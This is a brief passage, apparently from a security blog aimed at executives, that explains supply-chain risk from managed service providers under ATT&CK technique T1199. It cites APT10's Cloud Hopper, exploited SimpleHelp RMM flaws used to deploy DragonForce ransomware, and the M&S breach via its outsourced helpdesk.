T1199 (Trusted Relationship) — link — describes how MSPs' privileged access (VPN, RMM tools, admin credentials to hundreds of client networks) creates devastating amplification. Beyond Kaseya, Chinese state group APT10 (Operation Cloud Hopper) systematically targeted MSPs for downstream access. In 2025, SimpleHelp RMM vulnerabilities (CVE-2024-57726, CVE-2024-57727, CVE-2024-57728 — NVD) were exploited to deploy DragonForce ransomware through MSPs. The M&S attack originated via Tata Consultancy Services, which ran M&S's IT helpdesk.
Executive meaning: the more critical the supplier's access, the more dangerous even a "small" supplier weakness becomes.
Back to Writing